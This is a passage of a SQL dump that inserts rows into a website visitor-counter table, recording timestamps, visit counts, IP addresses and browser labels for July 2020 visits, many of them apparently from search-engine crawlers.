521818,1594512048,3,3,0,0,'66.249.70.72','chrome'),(521819,1594512131,1,1,0,0,'185.98.7.182','chrome'),(521820,1594512373,1,1,0,0,'207.180.205.141','chrome'),(521821,1594512530,1,1,0,0,'192.185.81.183','chrome'),(521822,1594512629,1,1,0,0,'178.154.200.222','other'),(521823,1594513010,2,2,0,0,'66.249.70.72','chrome'),(521824,1594513031,2,2,0,0,'66.249.64.38','chrome'),(521825,1594513041,3,3,0,0,'66.249.70.69','chrome'),(521826,1594513044,1,1,0,0,'66.249.70.70','chrome'),(521827,1594513099,1,1,0,0,'8.29.198.25','other'),(521828,1594513127,1,1,0,0,'8.29.198.26','other'),(521829,1594513242,1,1,0,0,'66.249.64.33','chrome'),(521830,1594513297,2,2,0,0,'66.249.64.36','chrome'),(521831,1594513346,8,8,0,0,'185.11.82.228','other'),(521832,1594513387,1,1,0,0,'192.36.52.37','other'),(521833,1594513546,1,1,0,0,'77.68.27.53','chrome'),(521834,1594513807,1,1,0,0,'178.154.200.19','other'),(521835,1594513863,1,1,0,0,'46.32.240.39','chrome'),(521836,1594514066,1,1,0,0,'66.249.76.16','chrome'),(521837,1594514276,1,1,0,0,'5.45.207.134','other'),(521838,1594514461,2,2,0,0,'66.249.70.70','chrome'),(521839,1594514491,1,1,0,0,'77.247.110.50','chrome'),(521840,1594514583,6,6,0,0,'66.249.70.69','chrome'),(521841,1594514625,1,1,0,0,'66.249.64.36','chrome'),(521842,1594514899,1,1,0,0,'213.180.203.16','other'),(521843,1594514913,1,1,0,0,'207.46.13.125','other'),(521844,1594515338,1,1,0,0,'178.154.200.222','other'),(521845,1594515377,2,2,0,0,'103.86.51.104','chrome'),(521846,1594515636,1,1,0,0,'66.249.64.33','chrome'),(521847,1594515698,3,3,0,0,'66.249.70.69','chrome'),(521848,1594515768,1,1,0,0,'66.249.64.36','chrome'),(521849,1594515909,2,2,0,0,'66.249.70.72','chrome'),(521850,1594516243,1,1,0,0,'178.154.200.43','other'),(521851,1594516511,1,1,0,0,'66.249.64.38','chrome'),(521852,1594516666,3,3,0,0,'192.169.197.207','chrome'),(521853,1594516979,1,1,0,0,'66.249.70.72','chrome'),(521854,1594516988,1,1,0,0,'213.180.203.60','other'),(521855,1594517009,1,1,0,0,'89.163.216.230','chrome'),(521856,1594517050,2,2,0,0,'66.249.70.69','chrome'),(521857,1594517148,2,2,0,0,'192.185.81.183','chrome'),(521858,1594517313,2,2,0,0,'66.249.70.70','chrome'),(521859,1594517722,2,2,0,0,'66.249.64.38','chrome'),(521860,1594517874,1,1,0,0,'5.45.207.184','other'),(521861,1594518042,1,1,0,0,'66.249.70.72','chrome'),(521862,1594518665,1,1,0,0,'207.46.13.125','other'),(521863,1594518698,1,1,0,0,'66.249.64.33','chrome'),(521864,1594518733,3,3,0,0,'66.249.70.69','chrome'),(521865,1594519317,3,3,0,0,'66.249.70.70','chrome'),(521866,1594519508,1,1,0,0,'207.46.13.227','other'),(521867,1594519837,1,1,0,0,'178.154.200.220','other'),(521868,1594519869,2,2,0,0,'188.165.225.146','chrome'),(521869,1594520134,1,1,0,0,'72.167.232.153','chrome'),(521870,1594520301,1,1,0,0,'51.68.11.199','chrome'),(521871,1594520624,2,2,0,0,'66.249.70.70','chrome'),(521872,1594520865,8,8,0,0,'185.11.82.228','other'),(521873,1594522058,3,3,0,0,'66.249.70.72','chrome'),(521874,1594522412,1,1,0,0,'178.154.200.222','other'),(521875,1594522513,1,1,0,0,'66.249.70.70','chrome'),(521876,1594522822,2,2,0,0,'66.249.70.69','chrome'),(521877,1594522831,1,1,0,0,'178.154.200.220','other'),(521878,1594522846,1,1,0,0,'207.46.13.125','other'),(521879,1594523226,1,1,0,0,'213.180.203.16','other'),(521880,1594523332,1,1,0,0,'207.46.13.227','other'),(521881,1594523503,1,1,0,0,'66.249.64.38','chrome'),(521882,1594523712,1,1,0,0,'66.249.70.70','chrome'),(521883,1594523933,2,2,0,0,'8.29.198.25','other'),(521884,1594523947,1,1,0,0,'5.45.207.162','other'),(521885,1594524100,1,1,0,0,'178.154.200.222','other'),(521886,1594524465,1,1,0,0,'66.249.64.33','chrome'),(521887,1594524743,1,1,0,0,'207.46.13.125','other'),(521888,1594524760,1,1,0,0,'178.154.200.97','other'),(521889,1594525052,1,1,0,0,'178.154.200.222','other'),(521890,1594525917,2,2,0,0,'207.46.13.227','other'),(521891,1594525932,1,1,0,0,'207.46.13.173','other'),(521892,1594526133,1,1,0,0,'66.249.70.70','chrome'),(521893,1594526208,3,3,0,0,'66.249.70.69','chrome'),(521894,1594526221,1,1,0,0,'66.249.64.33','chrome'),(521895,1594526870,1,1,0,0,'178.154.200.220','other'),(521896,1594527366,1,1,0,0,'178.154.200.159','other'),(521897,1594527545,3,3,0,0,'66.249.64.33','chrome'),(521898,1594527605,3,3,0,0,'66.249.70.69','chrome'),(521899,1594527611,1,1,0,0,'66.249.70.70','chrome'),(521900,1594527660,1,1,0,0,'66.249.64.36','chrome'),(521901,1594527897,1,1,0,0,'66.249.70.72','chrome'),(521902,1594527974,1,1,0,0,'213.180.203.16','other'),(521903,1594528157,1,1,0,0,'131.220.6.152','chrome'),(521904,1594528219,1,1,0,0,'31.177.95.172','chrome'),(521905,1594528262,1,1,0,0,'178.154.200.222','other'),(521906,1594528400,1,1,0,0,'213.180.203.119','other'),(521907,1594528550,1,1,0,0,'66.249.64.33','chrome'),(521908,1594529277,8,8,0,0,'185.11.82.228','other'),(521909,1594529335,2,2,0,0,'66.249.70.72','chrome'),(521910,1594529412,1,1,0,0,'62.205.134.182','other'),(521911,1594529760,1,1,0,0,'88.198.177.113','chrome'),(521912,1594529978,1,1,0,0,'5.45.207.118','other'),(521913,1594530355,1,1,0,0,'66.249.70.72','chrome'),(521914,1594530886,8,8,0,0,'185.11.82.228','other'),(521915,1594531221,2,2,0,0,'178.154.200.196','other'),(521916,1594531276,2,2,0,0,'178.154.200.222','other'),(521917,1594531339,2,2,0,0,'66.249.70.72','chrome'),(521918,1594532595,8,8,0,0,'185.11.82.228','other'),(521919,1594532707,1,1,0,0,'66.249.70.70','chrome'),(521920,1594533017,1,1,0,0,'213.180.203.29','other'),(521921,1594533020,2,2,0,0,'178.154.200.19','other'),(521922,1594533376,1,1,0,0,'51.91.15.103','chrome'),(521923,1594533391,1,1,0,0,'109.203.109.176','chrome'),(521924,1594534435,1,1,0,0,'5.45.207.184','other'),(521925,1594534446,8,8,0,0,'185.11.82.228','other'),(521926,1594534764,2,2,0,0,'8.29.198.26','other'),(521927,1594535318,2,2,0,0,'66.249.70.72','chrome'),(521928,1594535325,1,1,0,0,'66.249.70.70','chrome'),(521929,1594535419,1,1,0,0,'66.249.64.38','chrome'),(521930,1594535465,1,1,0,0,'178.154.200.155','other'),(521931,1594535838,3,3,0,0,'34.67.156.136','chrome'),(521932,1594535904,3,3,0,0,'35.188.218.121','chrome'),(521933,1594535928,3,3,0,0,'35.222.240.154','chrome'),(521934,1594535947,3,3,0,0,'35.193.111.185','chrome'),(521935,1594535957,2,2,0,0,'35.224.126.50','chrome'),(521937,1594535968,2,2,0,0,'35.238.21.150','chrome'),(521939,1594536269,1,1,0,0,'95.128.73.213','chrome'),(521940,1594536281,1,1,0,0,'66.249.70.72','chrome'),(521941,1594536288,8,8,0,0,'185.11.82.228','other'),(521942,1594536353,1,1,0,0,'66.249.70.70','chrome'),(521943,1594536623,2,2,0,0,'51.68.11.207','chrome'),(521944,1594536770,1,1,0,0,'35.214.236.72','chrome'),(521945,1594536795,1,1,0,0,'178.154.200.112','other'),(521946,1594536884,1,1,0,0,'178.154.200.236','other'),(521947,1594536969,1,1,0,0,'207.46.13.125','other'),(521948,1594536971,2,2,0,0,'72.52.238.73','chrome'),(521949,1594538101,1,1,0,0,'213.180.203.109','other'),(521950,1594538568,1,1,0,0,'5.45.207.94','other'),(521951,1594538875,1,1,0,0,'5.255.253.96','other'),(521952,1594538968,8,8,0,0,'185.11.82.228','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (521953,1594539185,1,0,1,0,'66.249.70.70',''),(521954,1594539312,1,1,0,0,'66.249.70.72','chrome'),(521955,1594539431,2,2,0,0,'207.46.13.173','other'),(521956,1594540563,1,1,0,0,'207.46.13.173','other'),(521957,1594540983,3,3,0,0,'66.249.70.69','chrome'),(521958,1594541141,2,2,0,0,'51.89.155.5','chrome'),(521959,1594541284,1,1,0,0,'17.58.99.7','other'),(521960,1594541319,2,2,0,0,'77.68.27.53','chrome'),(521961,1594542359,1,1,0,0,'178.154.200.22','other'),(521962,1594542592,1,1,0,0,'213.180.203.16','other'),(521963,1594542840,1,1,0,0,'66.249.70.69','chrome'),(521964,1594543210,1,1,0,0,'66.249.64.36','chrome'),(521965,1594543333,1,1,0,0,'31.177.95.49','chrome'),(521966,1594543462,1,1,0,0,'51.68.11.211','chrome'),(521967,1594544509,2,2,0,0,'66.249.70.69','chrome'),(521968,1594544975,1,1,0,0,'66.249.70.70','chrome'),(521969,1594545056,1,1,0,0,'195.210.46.62','chrome'),(521970,1594545594,2,2,0,0,'8.29.198.26','other'),(521971,1594545768,1,1,0,0,'85.203.44.161','chrome'),(521972,1594546287,1,1,0,0,'85.194.242.169','chrome'),(521973,1594546590,1,1,0,0,'40.77.189.30','other'),(521974,1594547105,1,1,0,0,'51.68.11.195','chrome'),(521975,1594547206,1,1,0,0,'69.163.152.143','chrome'),(521976,1594547208,8,8,0,0,'185.11.82.228','other'),(521977,1594547731,1,1,0,0,'178.154.200.216','other'),(521978,1594548007,1,1,0,0,'111.206.170.7','chrome'),(521979,1594548320,1,1,0,0,'5.45.207.184','other'),(521980,1594548358,1,1,0,0,'42.236.10.78','chrome'),(521981,1594548540,8,8,0,0,'185.11.82.228','other'),(521982,1594548684,1,1,0,0,'27.115.124.70','chrome'),(521983,1594548792,1,1,0,0,'17.58.99.7','other'),(521984,1594548864,1,1,0,0,'66.249.70.70','chrome'),(521985,1594548938,1,1,0,0,'213.180.203.122','other'),(521986,1594549033,1,1,0,0,'66.249.70.69','chrome'),(521987,1594549819,8,8,0,0,'185.11.82.228','other'),(521988,1594550482,2,2,0,0,'207.46.13.65','other'),(521989,1594550773,1,1,0,0,'5.45.207.100','other'),(521990,1594551148,8,8,0,0,'185.11.82.228','other'),(521991,1594551675,1,1,0,0,'178.154.200.91','other'),(521992,1594551767,1,1,0,0,'207.46.13.65','other'),(521993,1594552496,8,8,0,0,'185.11.82.228','other'),(521994,1594552702,2,2,0,0,'66.249.70.70','chrome'),(521995,1594552785,1,1,0,0,'5.255.253.72','other'),(521996,1594552845,1,1,0,0,'109.74.154.72','chrome'),(521997,1594552865,1,1,0,0,'207.46.13.173','other'),(521998,1594553807,8,8,0,0,'185.11.82.228','other'),(521999,1594554207,2,2,0,0,'66.249.70.72','chrome'),(522000,1594554358,1,1,0,0,'51.91.129.4','firefox'),(522001,1594554496,1,1,0,0,'66.249.64.36','chrome'),(522002,1594554556,1,1,0,0,'66.249.70.69','chrome'),(522003,1594555108,8,8,0,0,'185.11.82.228','other'),(522004,1594555512,1,1,0,0,'66.249.70.69','chrome'),(522005,1594555519,1,1,0,0,'66.249.70.70','chrome'),(522006,1594555522,1,1,0,0,'178.154.200.222','other'),(522007,1594555544,1,1,0,0,'178.154.200.112','other'),(522008,1594556373,2,2,0,0,'66.249.64.36','chrome'),(522009,1594556398,1,1,0,0,'178.154.200.196','other'),(522010,1594556406,8,8,0,0,'185.11.82.228','other'),(522011,1594556422,1,1,0,0,'8.29.198.25','other'),(522012,1594556432,1,1,0,0,'8.29.198.27','other'),(522013,1594556462,4,4,0,0,'66.249.70.70','chrome'),(522014,1594556542,2,2,0,0,'66.249.64.38','chrome'),(522015,1594556661,2,2,0,0,'66.249.70.69','chrome'),(522016,1594557085,1,1,0,0,'66.249.64.33','chrome'),(522017,1594557258,1,1,0,0,'178.154.200.87','other'),(522018,1594557605,1,1,0,0,'207.46.13.65','other'),(522019,1594557681,8,8,0,0,'185.11.82.228','other'),(522020,1594557745,2,2,0,0,'66.249.70.72','chrome'),(522021,1594557798,1,1,0,0,'66.249.64.38','chrome'),(522022,1594558068,1,1,0,0,'207.46.13.173','other'),(522023,1594558084,1,1,0,0,'178.154.200.22','other'),(522024,1594558159,1,1,0,0,'66.249.70.69','chrome'),(522025,1594558949,8,8,0,0,'185.11.82.228','other'),(522026,1594558956,1,1,0,0,'66.249.70.70','chrome'),(522027,1594559060,1,1,0,0,'213.180.203.90','other'),(522028,1594559343,1,1,0,0,'212.102.144.233','other'),(522029,1594559485,1,1,0,0,'66.249.64.36','chrome'),(522030,1594560270,8,8,0,0,'185.11.82.228','other'),(522031,1594561561,8,8,0,0,'185.11.82.228','other'),(522032,1594561667,8,8,0,0,'66.249.70.72','chrome'),(522033,1594561697,4,3,1,0,'66.249.70.70',''),(522034,1594561714,4,4,0,0,'66.249.64.38','chrome'),(522035,1594561718,40,40,0,0,'66.249.70.69','chrome'),(522036,1594561967,6,6,0,0,'66.249.64.33','chrome'),(522037,1594561995,6,6,0,0,'66.249.64.36','chrome'),(522038,1594562047,7,7,0,0,'66.249.70.70','chrome'),(522039,1594562735,1,1,0,0,'207.46.13.65','other'),(522040,1594562827,3,3,0,0,'66.249.70.72','chrome'),(522041,1594562884,8,8,0,0,'185.11.82.228','other'),(522042,1594562893,1,1,0,0,'51.210.161.23','other'),(522043,1594562936,1,1,0,0,'66.249.64.38','chrome'),(522044,1594563129,2,2,0,0,'66.249.64.33','chrome'),(522045,1594563243,3,3,0,0,'116.203.59.225','chrome'),(522046,1594563481,1,1,0,0,'66.249.64.36','chrome'),(522047,1594563594,1,1,0,0,'66.249.70.69','chrome'),(522048,1594564197,8,8,0,0,'185.11.82.228','other'),(522049,1594565475,8,8,0,0,'185.11.82.228','other'),(522050,1594566768,8,8,0,0,'185.11.82.228','other'),(522051,1594566807,1,1,0,0,'66.249.70.70','chrome'),(522052,1594567255,2,2,0,0,'8.29.198.26','other'),(522053,1594567717,1,1,0,0,'66.249.70.72','chrome'),(522054,1594567786,2,2,0,0,'66.249.70.69','chrome'),(522055,1594567907,2,2,0,0,'66.249.70.70','chrome'),(522056,1594568102,8,8,0,0,'185.11.82.228','other'),(522057,1594568791,1,1,0,0,'207.46.13.65','other'),(522058,1594568843,1,1,0,0,'66.249.70.69','chrome'),(522059,1594569045,1,1,0,0,'23.90.28.79','chrome'),(522060,1594569052,1,1,0,0,'104.227.121.141','chrome'),(522061,1594569366,8,8,0,0,'185.11.82.228','other'),(522062,1594569908,1,1,0,0,'66.249.70.72','chrome'),(522063,1594569981,1,1,0,0,'66.249.70.70','chrome'),(522064,1594570683,8,8,0,0,'185.11.82.228','other'),(522065,1594571238,1,1,0,0,'79.137.130.132','chrome'),(522066,1594571728,1,1,0,0,'66.249.70.70','chrome'),(522067,1594572081,8,8,0,0,'185.11.82.228','other'),(522068,1594573434,8,8,0,0,'185.11.82.228','other'),(522069,1594573640,1,1,0,0,'207.46.13.173','other'),(522070,1594574248,3,3,0,0,'66.249.64.36','chrome'),(522071,1594574786,8,8,0,0,'185.11.82.228','other'),(522072,1594575414,1,1,0,0,'66.249.70.72','chrome'),(522073,1594575745,1,1,0,0,'194.61.24.94','other'),(522074,1594576068,1,1,0,0,'207.46.13.65','other'),(522075,1594576723,1,1,0,0,'66.249.70.69','chrome'),(522076,1594576813,1,1,0,0,'66.249.64.33','chrome'),(522077,1594578080,1,1,0,0,'8.29.198.26','other'),(522078,1594578081,1,1,0,0,'8.29.198.25','other'),(522079,1594579133,1,1,0,0,'66.249.70.72','chrome'),(522080,1594580509,2,2,0,0,'66.249.70.70','chrome'),(522081,1594580535,22,22,0,0,'51.161.119.105','chrome'),(522082,1594580550,9,9,0,0,'51.161.119.105','firefox'),(522083,1594580586,8,8,0,0,'185.11.82.228','other'),(522084,1594580687,1,1,0,0,'51.161.119.105','other'),(522085,1594580940,1,1,0,0,'66.249.64.36','chrome'),(522086,1594580972,1,1,0,0,'66.249.70.69','chrome'),(522087,1594581008,1,1,0,0,'66.249.70.72','chrome'),(522088,1594581074,1,1,0,0,'66.249.64.33','chrome'),(522089,1594581265,1,1,0,0,'66.249.64.38','chrome'),(522090,1594581946,8,8,0,0,'185.11.82.228','other'),(522091,1594582506,1,1,0,0,'66.249.70.72','chrome'),(522092,1594583082,1,1,0,0,'66.249.70.69','chrome'),(522093,1594583269,8,8,0,0,'185.11.82.228','other'),(522094,1594583395,1,1,0,0,'178.154.200.41','other'),(522095,1594584330,1,1,0,0,'66.249.70.72','chrome'),(522096,1594584557,1,1,0,0,'207.46.13.65','other'),(522097,1594584614,8,8,0,0,'185.11.82.228','other'),(522098,1594585738,1,1,0,0,'42.236.10.84','chrome'),(522099,1594585980,8,8,0,0,'185.11.82.228','other'),(522100,1594586128,2,2,0,0,'66.249.70.70','chrome'),(522101,1594586179,1,1,0,0,'173.212.246.232','other'),(522102,1594586725,1,1,0,0,'66.249.70.72','chrome'),(522103,1594586730,1,1,0,0,'66.249.70.69','chrome'),(522104,1594587061,1,1,0,0,'207.46.13.65','other'),(522105,1594587325,8,8,0,0,'185.11.82.228','other'),(522106,1594588292,1,1,0,0,'66.249.70.72','chrome'),(522107,1594588583,2,2,0,0,'207.46.13.65','other'),(522108,1594588906,1,1,0,0,'8.29.198.26','other'),(522109,1594588907,1,1,0,0,'8.29.198.25','other'),(522110,1594588963,1,1,0,0,'66.249.70.69','chrome'),(522111,1594589237,8,8,0,0,'185.11.82.228','other'),(522112,1594589641,1,1,0,0,'46.219.231.117','chrome'),(522113,1594589883,1,1,0,0,'66.249.64.36','chrome'),(522114,1594590244,2,2,0,0,'66.249.64.38','chrome'),(522115,1594591315,2,2,0,0,'66.249.70.69','chrome'),(522116,1594591566,8,8,0,0,'185.11.82.228','other'),(522117,1594591864,1,1,0,0,'46.201.213.133','chrome'),(522118,1594592254,1,1,0,0,'66.249.70.72','chrome'),(522119,1594593107,1,0,1,0,'66.249.70.70',''),(522120,1594593282,1,1,0,0,'66.249.70.72','chrome'),(522121,1594593641,1,1,0,0,'66.249.70.69','chrome'),(522122,1594594204,1,1,0,0,'40.77.191.63','other'),(522123,1594594250,1,1,0,0,'178.154.200.222','other'),(522124,1594594252,1,1,0,0,'213.180.203.16','other'),(522125,1594594270,8,8,0,0,'185.11.82.228','other'),(522126,1594595386,1,1,0,0,'207.46.13.104','other'),(522127,1594595589,8,8,0,0,'185.11.82.228','other'),(522128,1594595770,1,1,0,0,'66.249.64.38','chrome'),(522129,1594596910,8,8,0,0,'185.11.82.228','other'),(522130,1594597008,1,1,0,0,'66.249.70.70','chrome'),(522131,1594597231,3,3,0,0,'66.249.70.69','chrome'),(522132,1594597260,1,1,0,0,'66.249.64.38','chrome'),(522133,1594597455,1,1,0,0,'66.249.64.36','chrome'),(522134,1594597754,2,2,0,0,'66.249.70.72','chrome'),(522135,1594597924,2,2,0,0,'66.249.64.33','chrome'),(522136,1594597982,1,1,0,0,'66.249.70.70','chrome'),(522137,1594598107,1,1,0,0,'62.205.134.182','other'),(522138,1594598205,8,8,0,0,'185.11.82.228','other'),(522139,1594598278,1,1,0,0,'207.46.13.173','other'),(522140,1594598390,1,1,0,0,'207.46.13.65','other'),(522141,1594599517,8,8,0,0,'185.11.82.228','other'),(522142,1594599545,1,1,0,0,'66.249.70.72','chrome'),(522143,1594599715,20,20,0,0,'216.18.204.154','firefox'),(522144,1594599734,1,1,0,0,'8.29.198.27','other'),(522145,1594599736,1,1,0,0,'8.29.198.26','other'),(522146,1594600106,2,2,0,0,'66.249.64.38','chrome'),(522147,1594600415,2,2,0,0,'66.249.70.69','chrome'),(522148,1594600819,8,8,0,0,'185.11.82.228','other'),(522149,1594600881,2,2,0,0,'66.249.70.70','chrome'),(522150,1594601549,4,4,0,0,'66.249.70.69','chrome'),(522151,1594602130,8,8,0,0,'185.11.82.228','other'),(522152,1594603134,1,1,0,0,'66.249.70.70','chrome'),(522153,1594603320,1,1,0,0,'207.46.13.5','other'),(522154,1594603472,8,8,0,0,'185.11.82.228','other'),(522155,1594603601,1,1,0,0,'207.46.13.173','other'),(522156,1594603951,7,7,0,0,'66.249.70.69','chrome'),(522157,1594604058,1,1,0,0,'66.249.70.72','chrome'),(522158,1594604518,1,1,0,0,'66.249.64.38','chrome'),(522159,1594604537,3,3,0,0,'66.249.70.70','chrome'),(522160,1594604754,8,8,0,0,'185.11.82.228','other'),(522161,1594604961,2,2,0,0,'66.249.70.72','chrome'),(522162,1594605812,1,1,0,0,'66.249.64.38','chrome'),(522163,1594605915,2,2,0,0,'66.249.70.70','chrome'),(522164,1594606055,8,8,0,0,'185.11.82.228','other'),(522165,1594606212,3,3,0,0,'66.249.70.72','chrome'),(522166,1594606268,2,2,0,0,'66.249.70.69','chrome'),(522167,1594607314,1,1,0,0,'66.249.64.33','chrome'),(522168,1594607401,8,8,0,0,'185.11.82.228','other'),(522169,1594607698,1,1,0,0,'66.249.70.69','chrome'),(522170,1594608049,1,1,0,0,'66.249.64.36','chrome'),(522171,1594608408,1,1,0,0,'66.249.64.38','chrome'),(522172,1594608713,2,2,0,0,'66.249.70.69','chrome'),(522173,1594608726,8,8,0,0,'185.11.82.228','other'),(522174,1594608942,1,1,0,0,'207.46.13.65','other'),(522175,1594609524,2,2,0,0,'66.249.70.72','chrome'),(522176,1594609677,2,2,0,0,'66.249.70.70','chrome'),(522177,1594610041,8,8,0,0,'185.11.82.228','other'),(522178,1594610131,2,2,0,0,'66.249.70.69','chrome'),(522179,1594610169,1,1,0,0,'207.46.13.173','other'),(522180,1594610560,1,1,0,0,'8.29.198.25','other'),(522181,1594610561,1,1,0,0,'8.29.198.26','other'),(522182,1594610711,1,1,0,0,'66.249.64.38','chrome'),(522183,1594610889,2,2,0,0,'66.249.70.72','chrome'),(522184,1594611079,1,1,0,0,'207.46.13.173','other'),(522185,1594611351,5,5,0,0,'66.249.70.69','chrome'),(522186,1594611403,8,8,0,0,'185.11.82.228','other'),(522187,1594611433,5,5,0,0,'66.249.70.70','chrome'),(522188,1594611456,1,1,0,0,'66.249.64.36','chrome'),(522189,1594612744,8,8,0,0,'185.11.82.228','other'),(522190,1594612869,2,2,0,0,'66.249.70.70','chrome'),(522191,1594612918,2,2,0,0,'66.249.64.38','chrome'),(522192,1594612935,3,3,0,0,'66.249.70.69','chrome'),(522193,1594613286,2,2,0,0,'66.249.70.72','chrome'),(522194,1594613452,1,1,0,0,'207.46.13.173','other'),(522195,1594613812,1,1,0,0,'66.249.70.70','chrome'),(522196,1594614112,8,8,0,0,'185.11.82.228','other'),(522197,1594614124,1,1,0,0,'66.249.64.33','chrome'),(522198,1594614438,1,1,0,0,'131.220.6.152','chrome'),(522199,1594614604,1,1,0,0,'207.46.13.65','other'),(522200,1594615175,1,1,0,0,'66.249.70.69','chrome'),(522201,1594615490,8,8,0,0,'185.11.82.228','other'),(522202,1594615691,1,1,0,0,'66.249.64.36','chrome'),(522203,1594615960,1,1,0,0,'62.205.134.182','other'),(522204,1594616387,1,1,0,0,'66.249.70.72','chrome'),(522205,1594616613,1,1,0,0,'178.133.213.193','chrome'),(522206,1594616733,1,1,0,0,'66.249.70.69','chrome'),(522207,1594616859,8,8,0,0,'185.11.82.228','other'),(522208,1594617902,3,3,0,0,'66.249.70.69','chrome'),(522209,1594618020,1,1,0,0,'66.249.64.38','chrome'),(522210,1594618082,1,1,0,0,'66.249.64.36','chrome'),(522211,1594618378,8,8,0,0,'185.11.82.228','other'),(522212,1594618644,1,1,0,0,'66.249.70.70','chrome'),(522213,1594618824,1,1,0,0,'212.1.124.210','chrome'),(522214,1594618940,3,3,0,0,'66.249.70.69','chrome'),(522215,1594619117,1,1,0,0,'66.249.64.33','chrome'),(522216,1594619408,1,1,0,0,'17.58.99.7','other'),(522217,1594619735,2,2,0,0,'66.249.70.72','chrome'),(522218,1594619759,1,1,0,0,'94.153.51.30','other'),(522219,1594619770,8,8,0,0,'185.11.82.228','other'),(522220,1594619905,2,2,0,0,'207.46.13.104','other'),(522221,1594620006,1,1,0,0,'66.249.70.70','chrome'),(522222,1594620615,2,2,0,0,'66.249.70.69','chrome'),(522223,1594620618,1,1,0,0,'66.249.64.33','chrome'),(522224,1594620819,1,1,0,0,'66.249.64.36','chrome'),(522225,1594621208,8,8,0,0,'185.11.82.228','other'),(522226,1594621262,2,2,0,0,'66.249.70.72','chrome'),(522227,1594621390,2,2,0,0,'8.29.198.26','other'),(522228,1594621561,1,1,0,0,'66.249.70.69','chrome'),(522229,1594621647,3,3,0,0,'66.249.70.70','chrome'),(522230,1594622237,1,1,0,0,'207.46.13.65','other'),(522231,1594622659,8,8,0,0,'185.11.82.228','other'),(522232,1594622760,1,1,0,0,'66.249.64.33','chrome'),(522233,1594622866,1,1,0,0,'77.222.134.102','chrome'),(522234,1594623009,1,1,0,0,'207.46.13.173','other'),(522235,1594623309,3,3,0,0,'66.249.70.70','chrome'),(522236,1594623575,3,3,0,0,'66.249.70.72','chrome'),(522237,1594623599,1,1,0,0,'176.111.33.18','firefox'),(522238,1594623655,1,1,0,0,'91.196.178.77','chrome'),(522239,1594623792,3,3,0,0,'66.249.70.69','chrome'),(522240,1594624155,8,8,0,0,'185.11.82.228','other'),(522241,1594624551,2,2,0,0,'66.249.70.72','chrome'),(522242,1594624677,1,1,0,0,'77.222.134.102','chrome'),(522243,1594625126,1,1,0,0,'66.249.64.33','chrome'),(522244,1594625208,3,3,0,0,'66.249.70.70','chrome'),(522245,1594625270,2,2,0,0,'66.249.64.38','chrome'),(522246,1594625646,8,8,0,0,'185.11.82.228','other'),(522247,1594625809,2,2,0,0,'66.249.70.69','chrome'),(522248,1594626353,1,1,0,0,'207.46.13.173','other'),(522249,1594627148,8,8,0,0,'185.11.82.228','other'),(522250,1594627179,1,1,0,0,'207.46.13.104','other'),(522251,1594627215,2,2,0,0,'66.249.70.72','chrome'),(522252,1594627248,3,3,0,0,'66.249.70.70','chrome'),(522253,1594627462,2,2,0,0,'66.249.64.33','chrome'),(522254,1594628342,1,1,0,0,'66.249.64.38','chrome'),(522255,1594628733,8,8,0,0,'185.11.82.228','other'),(522256,1594628776,1,1,0,0,'66.249.70.70','chrome'),(522257,1594628927,1,1,0,0,'66.249.70.69','chrome'),(522258,1594629087,1,1,0,0,'2.94.220.186','other'),(522259,1594629441,1,1,0,0,'207.46.13.65','other'),(522260,1594629467,1,1,0,0,'46.211.54.234','chrome'),(522261,1594629506,2,2,0,0,'46.219.207.119','chrome'),(522262,1594630118,1,1,0,0,'91.124.207.78','chrome'),(522263,1594630359,8,8,0,0,'185.11.82.228','other'),(522264,1594630435,1,1,0,0,'5.45.36.248','chrome'),(522265,1594630526,1,1,0,0,'207.46.13.104','other'),(522266,1594630549,1,1,0,0,'66.249.64.36','chrome'),(522267,1594631164,1,1,0,0,'91.196.178.187','chrome'),(522268,1594631187,1,1,0,0,'66.249.70.72','chrome'),(522269,1594631558,1,1,0,0,'66.249.64.33','chrome'),(522270,1594631657,1,1,0,0,'178.251.108.136','firefox'),(522271,1594631985,8,8,0,0,'185.11.82.228','other'),(522272,1594632212,1,1,0,0,'8.29.198.26','other'),(522273,1594632224,1,1,0,0,'8.29.198.27','other'),(522274,1594632307,2,2,0,0,'66.249.70.72','chrome'),(522275,1594632527,2,2,0,0,'66.249.64.33','chrome'),(522276,1594632599,3,3,0,0,'66.249.70.70','chrome'),(522277,1594632772,1,1,0,0,'3.236.214.77','chrome'),(522278,1594632892,1,1,0,0,'66.249.64.36','chrome'),(522279,1594632915,4,4,0,0,'66.249.70.69','chrome'),(522280,1594633524,1,1,0,0,'92.249.108.246','chrome'),(522281,1594633545,1,1,0,0,'66.249.70.70','chrome'),(522282,1594633643,8,8,0,0,'185.11.82.228','other'),(522283,1594633723,1,1,0,0,'66.249.64.33','chrome'),(522284,1594634040,1,1,0,0,'207.46.13.173','other'),(522285,1594634330,2,2,0,0,'207.46.13.104','other'),(522286,1594634679,3,3,0,0,'66.249.70.69','chrome'),(522287,1594635296,8,8,0,0,'185.11.82.228','other'),(522288,1594635347,1,1,0,0,'17.58.99.7','other'),(522289,1594635740,4,4,0,0,'66.249.70.69','chrome'),(522290,1594635960,3,3,0,0,'66.249.70.70','chrome'),(522291,1594636131,1,1,0,0,'66.249.64.33','chrome'),(522292,1594636285,2,2,0,0,'66.249.70.72','chrome'),(522293,1594636992,8,8,0,0,'185.11.82.228','other'),(522294,1594637107,1,1,0,0,'66.249.70.69','chrome'),(522295,1594637130,1,1,0,0,'66.249.64.38','chrome'),(522296,1594637823,2,2,0,0,'66.249.64.33','chrome'),(522297,1594637852,2,2,0,0,'66.249.70.70','chrome'),(522298,1594638427,1,1,0,0,'66.249.70.69','chrome'),(522299,1594638670,8,8,0,0,'185.11.82.228','other'),(522300,1594639096,1,1,0,0,'178.154.200.222','other'),(522301,1594639418,1,1,0,0,'109.74.154.72','chrome'),(522302,1594639653,1,1,0,0,'66.249.70.72','chrome'),(522303,1594639784,1,1,0,0,'66.249.70.69','chrome'),(522304,1594640203,1,1,0,0,'66.249.70.70','chrome'),(522305,1594640520,2,2,0,0,'95.132.34.137','chrome'),(522306,1594640522,8,8,0,0,'185.11.82.228','other'),(522307,1594641220,1,1,0,0,'207.46.13.65','other'),(522308,1594641319,2,2,0,0,'66.249.70.70','chrome'),(522309,1594641400,2,2,0,0,'66.249.70.72','chrome'),(522310,1594641637,3,3,0,0,'66.249.70.69','chrome'),(522311,1594641795,1,1,0,0,'66.249.64.33','chrome'),(522312,1594641844,2,2,0,0,'66.249.64.36','chrome'),(522313,1594642442,8,8,0,0,'185.11.82.228','other'),(522314,1594642547,1,1,0,0,'66.249.64.38','chrome'),(522315,1594642935,2,2,0,0,'66.249.70.72','chrome'),(522316,1594643035,3